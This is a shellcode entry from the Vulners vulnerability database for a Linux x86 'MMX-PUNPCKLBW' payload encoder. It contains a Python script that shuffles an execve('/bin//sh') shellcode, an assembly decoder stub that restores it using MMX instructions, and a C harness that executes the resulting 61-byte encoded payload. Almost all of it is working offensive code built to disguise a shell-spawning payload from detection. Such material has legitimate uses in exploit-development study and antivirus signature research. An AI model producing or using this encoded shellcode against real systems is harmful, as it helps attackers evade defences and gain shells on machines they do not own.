Vulners
Lucene search
Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)
################################################################################
INTRO
################################################################################
# Exploit Title: MMX-PUNPCKLBW Encoder
# Description: Payload encoder using MMX PUNPCKLBW instruction
# Date: 13/04/2019
# Exploit Author: Petr Javorik
# Tested on: Linux ubuntu 3.13.0-32-generic x86
# Shellcode length: 61
################################################################################
ENCODER
################################################################################
#!/usr/bin/env python
# stack execve
SHELLCODE = bytearray(
b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
)
# Align to qword multiples
missing_bytes = 8 - (len(SHELLCODE) % 8)
padding = [0x90 for _ in range(missing_bytes)]
SHELLCODE.extend(padding)
# Shuffle payload
shuffled_payload = []
# First byte carries count of needed PUNPCKLBW loops
loop_count = len(SHELLCODE)//8
shuffled_payload.append(loop_count)
for block_num in range(0, loop_count):
current_block = SHELLCODE[(8 * block_num) : (8 * block_num + 8)]
shuffled_block = [current_block[i] for i in [0, 2, 4, 6, 1, 3, 5, 7]]
shuffled_payload.extend(shuffled_block)
# Remove trailing NOPS
for byte in shuffled_payload[::-1]:
if byte == 0x90:
del shuffled_payload[-1]
else:
break
# Print shellcode
print('Payload length: {}'.format(len(shuffled_payload)))
print('\\x' + '\\x'.join('{:02x}'.format(byte) for byte in shuffled_payload))
print('0x' + ',0x'.join('{:02x}'.format(byte) for byte in shuffled_payload))
################################################################################
DECODER
################################################################################
global _start
section .text
_start:
jmp short call_decoder
decoder:
pop edi
xor ecx, ecx
mov cl, [edi]
inc edi
mov esi, edi
decode:
movq mm0, qword [edi]
movq mm1, qword [edi +4]
punpcklbw mm0, mm1
movq qword [edi], mm0
add edi, 0x8
loop decode
jmp esi
call_decoder:
call decoder
EncodedShellcode: db 0x04,0x31,0x50,0x2f,0x73,0xc0,0x68,0x2f,0x68,0x68,0x62,0x6e,0xe3,0x2f,0x69,0x89,0x50,0x89,0x53,0xe1,0x0b,0xe2,0x89,0xb0,0xcd,0x80
################################################################################
TESTING
################################################################################
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x1c\x5f\x31\xc9\x8a\x0f\x47\x89\xfe\x0f\x6f\x07\x0f\x6f\x4f\x04\x0f\x60\xc1\x0f\x7f\x07\x83\xc7\x08\xe2\xee\xff\xe6\xe8\xdf\xff\xff\xff\x04\x31\x50\x2f\x73\xc0\x68\x2f\x68\x68\x62\x6e\xe3\x2f\x69\x89\x50\x89\x53\xe1\x0b\xe2\x89\xb0\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*CodeFun)() = (int(*)())code;
CodeFun();
}
################################################################################
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Apr 2019 00:00Current
0.3Low risk
Vulners AI Score0.3